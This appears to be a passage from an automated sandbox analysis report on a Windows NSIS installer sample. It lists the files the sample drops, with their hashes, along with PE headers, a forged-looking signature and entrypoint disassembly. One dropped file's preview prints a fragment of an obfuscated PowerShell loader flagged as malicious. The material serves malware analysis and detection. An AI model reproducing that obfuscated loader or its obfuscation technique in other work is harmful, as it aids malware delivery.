      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode

      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brn2scjp.z50.ps1

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode

      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fsesrv2m.vna.psm1

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode

      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ftet1atv.orj.ps1

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode

      C:\Users\user\AppData\Local\Temp\nspF61A.tmp

      Download File
      Process:C:\Users\user\Desktop\Ej86aa7Ki7.exe
      File Type:data
      Category:dropped
      Size (bytes):13654653
      Entropy (8bit):0.5213970368694034
      Encrypted:false
      SSDEEP:12288:w103sy1TPJAyut7RakRntw2Wj6ui3xS404I:qh/agnK2WESy
      MD5:C1E85754AF7751D70A273BA829DF134C
      SHA1:0F6D75BF01E63206891B3AFF6DB990718688F90A
      SHA-256:36846B524EA8AEB697D1338067015945EFA7AF2506974A2E577B8980DCED584D
      SHA-512:D61D66DED161B936CC5419FB8E666E789B691CC903ADEE2B165F3B1B9F324BBCF39884B72F47C65B1BDD94220A03E733CE0A64299AC4A297311B7F180F654600
      Malicious:false
      Preview:.&......,...................r...<........&.......&..........................Y...y...........................................................................................................................................................................................................G...J...............j...............................................................................................................................................1....4..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Roaming\afdragsordning\Aesthesis.Ost

      Download File
      Process:C:\Users\user\Desktop\Ej86aa7Ki7.exe
      File Type:Matlab v4 mat-file (little endian) c, numeric, rows 2930638931, columns 44718, imaginary
      Category:dropped
      Size (bytes):328448
      Entropy (8bit):7.587500236600282
      Encrypted:false
      SSDEEP:6144:/dMm03sy1TPJAwfYptN5GWakUC2aWascPw2WGC6VPYi3/bQkvS40m:l103sy1TPJAyut7RakRntw2Wj6ui3xS0
      MD5:AE4243BF77F415B74C7F2ECC7F9E65C2
      SHA1:2C98B5B8B260F72455B8E336270BF60A70D43B81
      SHA-256:515D68CE7C2BDD5E4511767C4172B14C3D6A76D96ACB67FE94538325A71307B8
      SHA-512:E963411A9F9E5E023F2276A2B2C6A9D59F9276170593BDAD6434B199C4B0467D7C5BF7CF62B6723773412AC527AB8BA743C2A37E137425108B3FEC67F806C4B4
      Malicious:false
      Preview:....S.......^.......c.KKK.-......1.fff........PP..t................m........r......ii....G.....555.....*..........i...........UU..*...vvvvvv..K..................V.......................}..................K..................$.............C.......................X.............gg....E...............k.vv..................WW....FF....PPPPPP................................JJJJJ...................Z....u........Y....(.......FF...-........1....................................................................###...........................222...#.....Q........3..........C.r................%%%%.V......k.....dd..P.rrr.---....>>>..4................[...........QQQQ..................a..ZZ..........JJ.O..@@..CC.............555....................<....X.........###.........--.........................F.......................VVVV..c.......}........}}}.............``.......>>>>...a..H.ss.I...7..................v...\..................+........ii.......)))).v...a..........O...............G.........hh......S..

      C:\Users\user\AppData\Roaming\afdragsordning\Fldekagens.won

      Download File
      Process:C:\Users\user\Desktop\Ej86aa7Ki7.exe
      File Type:data
      Category:dropped
      Size (bytes):4978097
      Entropy (8bit):0.1587330501431333
      Encrypted:false
      SSDEEP:768:oe1c3080LtMUV9O6Ivcs/3cwrp3F96u4PtAbY6NBQAGuwtNYq5jzP9qy2IccGm5q:Fh7Sx
      MD5:E10E4A4F5E9C6C25F30E6F229F5941F3
      SHA1:0CA6DF1C6FB3497E2A8D74F808CC0F23B3295A1F
      SHA-256:CF6A84E24A1F2104FFC6D00058FE72BC8FAD5A36F982503E1A7F1AAFFBEDCDE9
      SHA-512:B7059A1F3D6D19E465DF570A29CC0B233EBF5EFC1E2C07DDBAC71ADC747E1602326B63E93FFB39F1BBA5D300CF394472EED4E8FD28FEBC0E579964FB0EF136DB
      Malicious:false
      Preview:.......................................................................................................g.......................................................................................................................................................................................................................L..........................................................................................................................................................................................................................j................................................................................................................................................................................................................................................................................................................................ ................................................................................#...........................................................

      C:\Users\user\AppData\Roaming\afdragsordning\Sygehjlperens156.jou

      Download File
      Process:C:\Users\user\Desktop\Ej86aa7Ki7.exe
      File Type:data
      Category:dropped
      Size (bytes):4452491
      Entropy (8bit):0.15755416186137736
      Encrypted:false
      SSDEEP:768:dcQDlfI1V+H0C0cnDtbLdHPWfWYefayfCUel0BcvR+7D6xUtH1W0mtLhIplZAicU:xzpxZ
      MD5:23FBA11F197C3671FEC5F037ED860A34
      SHA1:00268C2C72B421CA022770C859FDA9C87610ED0B
      SHA-256:09192DE63A90EA42794CCD244E51DE7F64EA2B4A59FF371B0DA6DD713DA0CC6A
      SHA-512:B79F022A6FFCD7F697FA3FD878F9920AFB5C39F02F8B7799B5E240A94AE9881B43F2D62F1B26D867A9F71B17F9D71EDD3DE2871825381F679805B38722330DF0
      Malicious:false
      Preview:........................................Z...........................................................................................................................................................................................................................................................................................................................................................d.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.............................................................................................................................................................

      C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe

      Download File
      Process:C:\Users\user\Desktop\Ej86aa7Ki7.exe
      File Type:Unicode text, UTF-8 text, with very long lines (4359), with CRLF, LF line terminators
      Category:dropped
      Size (bytes):74068
      Entropy (8bit):5.167802605183943
      Encrypted:false
      SSDEEP:768:K6aeZ2PXwKT0qB7RMiqvQoTqrpQnobwyLscxWEku6U26lEf4kTgHOP3VAEh75Xmc:K6pGgKR0qeobwywgZpEf4fUAEhVXkXFU
      MD5:715FBEC5560F3D80EB426C7894CE9F6E
      SHA1:0C0D5307F81989998E7CA0B72BE4790F8177F6C6
      SHA-256:310BCE61CC19865538CC2C47A05D52F51453A914463CF4AAD37B41BFB8C9FCEF
      SHA-512:6C5B3A1249891EDFA4F0A9C98200AA510987190C2C2C812F7A09E26F39F0935A7688069AD168D0949FFBC725227D503E53945EAFC2AC36D9348EAB4E01D660E7
      Malicious:true
      Preview:$Wisecrackers=$Latices;........$Aandelyds = @'.Fissern.Syntact$LighedsT OverspiStagninpL.vregip TotaleeChoristlLaquea aFreddisd Envenos Thorshr As,rosrGnost ceLivsvarsVedstaatTorneroeTrykpr eEdriast=Enlig.t$DigteriT Avi udiAandsfopUrmennep RumpereRindekrlNonconsa Kldebod .elgnis Overm fTrefoldh CamaldaLremestaModgaaerDehumide akturan omanchd HodogreEks one;Skibsbe.,dressefEpisediuOpf.gninInsensucSulfatitSemperiiBrugerioSpydet nKlatres AntagonUPummelln Erhverc.oomfuleEksilrenLadlefutexpressrWoozie ioutsavocMenighe Cinemat(Evol ti$UdslageT ud.angiSpithampshallowpComanageHjulpislNymphetaStrepitdChecklisO trick,Fodtuds$ EtagerTSvvef yoOutsavonCoalsa.gSlaaskauGlovemaeHjarnsds MuseumhLeverano insoldtrariora)Waterfl Ketenst{Pistole.Re tifi.Predest$ CteletMhydrochoLandvsed orttns Nontolt Vrel ei Uhensil Skat.llSk vrideHanebaar gas.rt Spanked(FirmaomHRawlplueGlobelenGriberwfBenz,coa nderlirBitmnsteIndeksen Dobbel tjekkos'Gle nsaAManualinLoplukkdCaddiceeSkewbacsIndirublMicroclaHypodor$DetribaK

      C:\Users\user\AppData\Roaming\afdragsordning\afbagendes.txt

      Download File
      Process:C:\Users\user\Desktop\Ej86aa7Ki7.exe
      File Type:ASCII text, with very long lines (395), with CRLF line terminators
      Category:dropped
      Size (bytes):539
      Entropy (8bit):4.247606033101229
      Encrypted:false
      SSDEEP:12:qHRqobbnuuNQHpX2gBsLD0kcc+W8R2JT+JPrwIAu4HoW/Q3It:qxqobbnuuNQHpagkF8wUSBrIoQ4t
      MD5:D11C07A55FF09B0A2E0C9BCF181DD969
      SHA1:621D61F1A8F8574548334E4F732B04410E1A964D
      SHA-256:495BFCF071659DDB9BC7783981E1BC6E8FCD2CE81C6C31895D68BF9919B7665E
      SHA-512:54FE8BBBF9FF90F5B0F9CDA6784C3B6AB8FA2D163BDC3FCE39F1FA30ADB3691AF9968DC50AE40DA27F0E18DF952D22040ED9318A88E545672D048B42C94CC3B6
      Malicious:false
      Preview:ankelknoglers udraabstegns hyperhypocrisy constantinian roheryn unendeavored forfdre decks barnet endepunktsjusteringernes masochisms twiniest..unionisation spidsborgernes ukuransnedskrivningerne quiche bizarreriets chirps confessionist.marocain berrugate classicise johannesbrd copart knocks,slagters jarldoemme generalizability rkereaktionre slitteskrues khedive vitilitigate,sojaskraa decimalskilletegn fanebrereder magus echidnidae skarre.missilformularens aftagende recontracting ciffertasterne tydningerne fagstudienvnenes recepturs,

      C:\Users\user\AppData\Roaming\afdragsordning\fictionise.res

      Download File
      Process:C:\Users\user\Desktop\Ej86aa7Ki7.exe
      File Type:data
      Category:dropped
      Size (bytes):3811024
      Entropy (8bit):0.15926420403649424
      Encrypted:false
      SSDEEP:768:HG4zGp2v5B9pNmzcIKyHhI8sz7YQcjekdzjECZsTbSmxOR46e5HIcOuWofyVRHXB:t/6
      MD5:6BF42A0A5D506264C42F0A8FF53E718E
      SHA1:8A33E324C152756DA8AA50E351B4C9C92458AB80
      SHA-256:D8F4ECA0C0A30915ED44DB12CE1F356D3532E71E324B2B86FB71A61630FF16B7
      SHA-512:5C1E92EA9CCAF82777A384CA868C319DD3400A910934F6B606FCC4A4E0F1EA6D52027D85169556F021432E0D6346223979D518689DA79A75EE61D046648056B2
      Malicious:false
      Preview:..........................................................................................................@...........................................................................................................................................................................................................................................................................................................................................&............................................................\..........................................................................................................................................................................................................................................@.........................................................................................................................................................................................................................................................................

      C:\Windows\Logs\SIH\SIH.20250110.124027.088.1.etl

      Download File
      Process:C:\Windows\System32\SIHClient.exe
      File Type:data
      Category:dropped
      Size (bytes):12288
      Entropy (8bit):3.171888667447024
      Encrypted:false
      SSDEEP:192:F1TrmEqBI2rJ6S0CaHWdr7boD7EbnZfux:FJrmnBI2rJ6S0CgWdr7cD7EbnZfux
      MD5:4D467BD94C5AB5DECCAF24759A86C8C7
      SHA1:2F39A1B2F4AA86DB63A7CB7EB1CEF81E07D967A5
      SHA-256:2231983DC64DB7DFA27A79E56390D5B31ED8AA39D7CA22D7F651A3A6288A465B
      SHA-512:188D6CA2A66E5CC13E23DABFB6F1D813DA5E8DC8E7BF7313DAE5AD0241356EFE012590DFBDBEDD8AE35630A766BAB2100F03386359D42F9F791C0E253243FF07
      Malicious:false
      Preview:....P...P.......................................P...!.....................................[.....................eJ.........c..Zb....... ......................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W..............J.(..c..........S.I.H._.t.r.a.c.e._.l.o.g...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.S.I.H.\.S.I.H...2.0.2.5.0.1.1.0...1.2.4.0.2.7...0.8.8...1...e.t.l.......P.P...........[.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMP3C1B.tmp

      Download File
      Process:C:\Windows\System32\SIHClient.exe
      File Type:Microsoft Cabinet archive data, single, 462 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 31944, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
      Category:dropped
      Size (bytes):17126
      Entropy (8bit):7.3117215578334935
      Encrypted:false
      SSDEEP:192:D5X8WyNHDHFzqDHt8AxL5TKG+tJSdqnajapCNjFZYECUqY7oX9qhnJSdqnaja2Sl:qDlsHq4ThPdlmY9CUiqOdlm2W
      MD5:1B6460EE0273E97C251F7A67F49ACDB4
      SHA1:4A3FDFBB1865C3DAED996BDB5C634AA5164ABBB8
      SHA-256:3158032BAC1A6D278CCC2B7D91E2FBC9F01BEABF9C75D500A7F161E69F2C5F4A
      SHA-512:3D256D8AC917C6733BAB7CC4537A17D37810EFD690BCA0FA361CF44583476121C9BCCCD9C53994AE05E9F9DFF94FFAD1BB30C0F7AFF6DF68F73411703E3DF88A
      Malicious:false
      Preview:MSCF............D................|...............A..........d.......................environment.xml.....b...CK..ao.0...J...&.q...-..;+.6+-i.......7.....=....g.P.RQ.#..#...QQ..p.kk..qX..)...T.....zL#<.4......\k..f..,.Q...`..K7.hP..".E.53.V.DW.X).z.=`.COO 8..8.......!$.P!`00....E.m..l .)".J.vC..J..&...5.5(.a..!..MIM...*......z.;......t.<.o..|CR.3>..n.;8dX....:....N.....U.......J.I(vT..3...N....$.._^.A<....&=._(N....m.u.1}.....Ax.b8....q~.i..0.A...*.H........A.0.@....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...,..gK.........(...._`Oa..;%.010...`.H.e....... K...,.%@.b./.a...Q.:..E.7....V~....0...0..........3....!.G~&.9......0...*.H........0~1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1(0&..U....Microsoft Update Signing CA 2.20...190502214449Z..200502214449Z0o1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1.0...U....Microsoft Update0.."0...*

      C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\sls.cab

      Download File
      Process:C:\Windows\System32\SIHClient.exe
      File Type:Microsoft Cabinet archive data, single, 7826 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 53283, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
      Category:dropped
      Size (bytes):24490
      Entropy (8bit):7.629144636744632
      Encrypted:false
      SSDEEP:384:iarwQcY8StpA7IQ6GCq30XPSIleI7lzCuqvfiSIleIx:iartHA7PCFP66Tqvfi6c
      MD5:ACD24F781C0C8F48A0BD86A0E9F2A154
      SHA1:93B2F4FBF96D15BE0766181AFACDB9FD9DD1B323
      SHA-256:5C0A296B3574D170D69C90B092611646FE8991B8D103D412499DBE7BFDCCCC49
      SHA-512:7B1D821CF1210947344FCF0F9C4927B42271669015DEA1C179B2BEAD9025941138C139C22C068CBD7219B853C80FA01A04E26790D8D76A38FB8BEBE20E0A2A4A
      Malicious:false
      Preview:MSCF............D...............#................A..........d........B..............environment.cab.x.\&..BCK.\.T...N.....;LB.JW.. .w!....$*...U....."........ (.. E..........w...e.Jf.3gN.{...{V.M4.!.....hn. p(... .a...f..f..j.....Kh5..l.DB\}.=.0.>..X.....z..,'..LC/>....h.>.>.........,~mVI.....'EGD]^..\{....Q....f...4.F.....q..FF.1~...Q,.."g.qq.......}.....g%Zz.;m.9..z../2Jl.p8wGO......-V....FM......y*.....Hy.xy......N.r;.@uV........Xa...b].`..F...y.Wd.e.8.[Z.s7].....=B.$...'.|.-.sC....a_(..$..i.C.T.F}...]...m.R,y.1...'..j3.....ir..B..)sR.G.*..`-=.w....m..2y.....*o...\{..C.4.:ZM..wL-$.I.x:?.!.....:..W.%&.....J.%.....~....E..T.d.Q{..p..J..pY...P../.."rp....`...#w.....'.|n%Dy,.....i....."..x.....b._..\_.^.XOo..*:.&a.`..qA.?.@..t.R/...X3.nF.&........1Z.r.S...9x........?..aP..A...f..k:..\....L...t....Q...1..A..33A1.t..)...c....;......$.$..>._....A.!g`..t...b.H.L..&.....!......v~.n...uE.x...."5.h.4..B.R.d.4.%--.`.B..."..[....l......x(..5......@.zr....

      C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP4668.tmp

      Download File
      Process:C:\Windows\System32\SIHClient.exe
      File Type:Microsoft Cabinet archive data, single, 858 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 12183, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
      Category:modified
      Size (bytes):19826
      Entropy (8bit):7.454351722487538
      Encrypted:false
      SSDEEP:384:3j+naF6zsHqnltHNsAR9zCfsOCUPTNbZR9zOzD8K:z1F6JLts89zIdrFT9zwoK
      MD5:455385A0D5098033A4C17F7B85593E6A
      SHA1:E94CC93C84E9A3A99CAD3C2BD01BFD8829A3BCD6
      SHA-256:2798430E34DF443265228B6F510FC0CFAC333100194289ED0488D1D62C5367A7
      SHA-512:104FA2DAD10520D46EB537786868515683752665757824068383DC4B9C03121B79D9F519D8842878DB02C9630D1DFE2BBC6E4D7B08AFC820E813C250B735621A
      Malicious:false
      Preview:MSCF....Z.......D................/..........Z....J..........d.......................environment.xml........CK....8.....w..=.9%T`.eu:.jn.E.8......m_.o?...5.K.{.3X3....^.{i..b......{.+.....y:..KW;;\..n.K=.]k..{.=..3......D$.&IQH.$-..8.r.{..HP.........g....^..~......e.f2^..N.`.B..o.t....z..3..[#..{S.m..w....<M...j..6.k.K.....~.SP.mx..;N.5..~\.[.!gP...9r@"82"%.B%..<2.c....vO..hB.Fi....{...;.}..f|..g.7..6..].7B..O..#d..]Ls.k..Le...2.*..&I.Q.,....0.\.-.#..L%.Z.G..K.tU.n...J..TM....4....~...:..2.X..p.d....&.Bj.P(.."..).s.d....W.=n8...n...rr..O._.yu...R..$....[...=H"K<.`.e...d.1.3.gk....M..<R......%1BX.[......X.....q......:...3..w....QN7. .qF..A......Q.p...*G...JtL...8sr.s.eQ.zD.u...s.....tjj.G.....Fo...f`Bb<.]k..e.b..,.....*.1.:-....K.......M..;....(,.W.V(^_.....9.,`|...9...>..R...2|.|5.r....n.y>wwU..5...0.J...*.H........J.0.I....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...>^..~a..e.D.V.C...

      C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\sls.cab

      Download File
      Process:C:\Windows\System32\SIHClient.exe
      File Type:Microsoft Cabinet archive data, single, 11149 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 18779, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
      Category:dropped
      Size (bytes):30005
      Entropy (8bit):7.7369400192915085
      Encrypted:false
      SSDEEP:768:ouCAyCeQ8fkZdfTGo/its89z8gjP69zA4:Aqf56z8HzT
      MD5:4D7FE667BCB647FE9F2DA6FC8B95BDAE
      SHA1:B4B20C75C9AC2AD00D131E387BCB839F6FAAABCA
      SHA-256:BE273EA75322249FBF58C9CAD3C8DA5A70811837EF9064733E4F5FF1969D4078
      SHA-512:DDB8569A5A5F9AD3CCB990B0A723B64CEE4D49FA6515A8E5C029C1B9E2801F59259A0FC401E27372C133952E4C4840521419EF75895260FA22DFF91E0BE09C02
      Malicious:false
      Preview:MSCF.....+......D...............[I...........+...I..........d.......rM..............environment.cab...Q.!+rMCK.|.XT....CI7.....AR..$..C$D....RA:....T..........o...g...>.....s....z...>..<...J.R.A......%}..... 0............\...e.z...@..{..,./.:9:X8.s^q...>.(]...I)....'..v@....!.(.i.n.!.g.8\/.+X3.E.~.pi...Q...B...."Oj..~.:....M....uB.}..v.WR........tDD......D7..j..`..5..E.2.z..C....4.s....r..Y.:.|.mtg...S..b._.....!.~Kn..E.=...x.N..e.)....xz...p..h.;..xR'...U.}........nK.+.Y........p..r _.;?.m}$..*%&...8. 7..T....,7..F...e...kI.y...q....".W.W..[..gZQ.....W.$k.T"...N.*...5.R...,+...u.~VO...R-......H7..9........].K....]....tS~*.LSi....T....3+........k......i.J.y...,.Y|.N.t.LX.....zu..8......S*7..{y.m.....Ob.....^.S8Kn.i.._.c~.x.ce.A...t........S.......i1......V..S]H....$..J....E..j...4...o.$..).....;.n<.b.}.(.J.]...Q..u,.-.Bm.[z.j..-i.."...._v.......N..+...g..v..../...;G.Yw....0..u...z....J..K.E..s&..u.h3.]J.G............Z....=.N.X..

      Static File Info

      General

      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
      Entropy (8bit):7.776667616204929
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.96%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:Ej86aa7Ki7.exe
      File size:840'408 bytes
      MD5:cc768b964d98fa2d0cf4d9089176c6b9
      SHA1:5150a1c337194f1d224cc71a5487c398c12e94f6
      SHA256:05199e2da28bae00c03632e937ba49adba3bd5c9ef102e14639de784a82eb765
      SHA512:b1611d227a1340a9a46affcf6c09199deaeda2b36f36274682b4e2114c503449b1d193f0aa1ac6783559a954bc57882b3d69e30a3016697958a526ef54447c5a
      SSDEEP:12288:yzpSfLBm0qhwjFvqD/xvA8xq/gWfRprXsaVtyM72Gxq7zwenwy0neWRnWR09z:eSVxqwjdqVH8prTVt5g7TwpXRWW9z
      TLSH:9F0512C2FB008983F5F36F7E5D491F529BA0ACB8D441E61E21E93B5E29F1230D94E685
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L...8.MX.................b...*......J4............@

      File Icon

      Icon Hash:000204191163061d

      Static PE Info

      General

      Entrypoint:0x40344a
      Entrypoint Section:.text
      Digitally signed:true
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Time Stamp:0x584DCA38 [Sun Dec 11 21:50:48 2016 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:4
      OS Version Minor:0
      File Version Major:4
      File Version Minor:0
      Subsystem Version Major:4
      Subsystem Version Minor:0
      Import Hash:4ea4df5d94204fc550be1874e1b77ea7

      Authenticode Signature

      Signature Valid:false
      Signature Issuer:CN=Smadderfuldt, E=Bellatrix@Squirtiness.Bl, O=Smadderfuldt, L=Puyvalador, OU="Pretypifying Wheelsmen ", S=Occitanie, C=FR
      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
      Error Number:-2146762487
      Not Before, Not After
      • 19/12/2023 07:16:12 18/12/2024 07:16:12
      Subject Chain
      • CN=Smadderfuldt, E=Bellatrix@Squirtiness.Bl, O=Smadderfuldt, L=Puyvalador, OU="Pretypifying Wheelsmen ", S=Occitanie, C=FR
      Version:3
      Thumbprint MD5:EE95DCF96BDCA8ABE95B2C27A3B5DD70
      Thumbprint SHA-1:F15522D6D080DDE32830014E5D517C05A9862FE8
      Thumbprint SHA-256:F28C0559727E645C7F69DF64A9FF09C9E88801DFA9CFE8347ABA2172331272B4
      Serial:098A68503FB53E54AECC6CC65EF8C5BAFDD9D52D

      Entrypoint Preview

      Instruction
      sub esp, 000002D4h
      push ebx
      push esi
      push edi
      push 00000020h
      pop edi
      xor ebx, ebx
      push 00008001h
      mov dword ptr [esp+14h], ebx
      mov dword ptr [esp+10h], 0040A230h
      mov dword ptr [esp+1Ch], ebx
      call dword ptr [004080B4h]
      call dword ptr [004080B0h]
      cmp ax, 00000006h
      je 00007FB8412F42B3h
      push ebx
      call 00007FB8412F740Ch
      cmp eax, ebx
      je 00007FB8412F42A9h
      push 00000C00h
      call eax
      mov esi, 004082B8h
      push esi
      call 00007FB8412F7386h
      push esi
      call dword ptr [0040815Ch]
      lea esi, dword ptr [esi+eax+01h]
      cmp byte ptr [esi], 00000000h
      jne 00007FB8412F428Ch
      push ebp
      push 00000009h
      call 00007FB8412F73DEh
      push 00000007h
      call 00007FB8412F73D7h
      mov dword ptr [0042A244h], eax
      call dword ptr [0040803Ch]
      push ebx
      call dword ptr [004082A4h]
      mov dword ptr [0042A2F8h], eax
      push ebx
      lea eax, dword ptr [esp+34h]
      push 000002B4h
      push eax
      push ebx
      push 004216E8h
      call dword ptr [00408188h]
      push 0040A384h
      push 00429240h
      call 00007FB8412F6FC0h
      call dword ptr [004080ACh]
      mov ebp, 00435000h
      push eax
      push ebp
      call 00007FB8412F6FAEh
      push ebx
      call dword ptr [00408174h]
      add word ptr [eax], 0000h

      Rich Headers

      Programming Language:
      • [EXP] VC++ 6.0 SP5 build 8804

      Data Directories

      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x500000x17788.rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0xccba00x738
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b4.rdata
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

      Sections

      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x10000x61f10x62002ce901035717865394b5faeda5b43e0fFalse0.6656967474489796data6.477074763411717IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .rdata0x80000x13a40x14004ac891d4ddf58633f14436f9f80ac6b6False0.4529296875data5.163001655755973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .data0xa0000x203380x600df898dbdc013374b871e011dcd904b20False0.501953125data3.9745558434885093IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .ndata0x2b0000x250000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .rsrc0x500000x177880x178009a8320a105424ee3931a3b49e74f1e10False0.16107047872340424data3.87775241222699IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

      Resources

      NameRVASizeTypeLanguageCountryZLIB Complexity
      RT_ICON0x503b80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.11695551875073938
      RT_ICON0x60be00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.22240663900414936
      RT_ICON0x631880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.29924953095684803
      RT_ICON0x642300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.23480810234541577
      RT_ICON0x650d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.23826714801444043
      RT_ICON0x659800x668Device independent bitmap graphic, 48 x 96 x 4, image size 0EnglishUnited States0.24390243902439024
      RT_ICON0x65fe80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.25
      RT_ICON0x665500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.5567375886524822
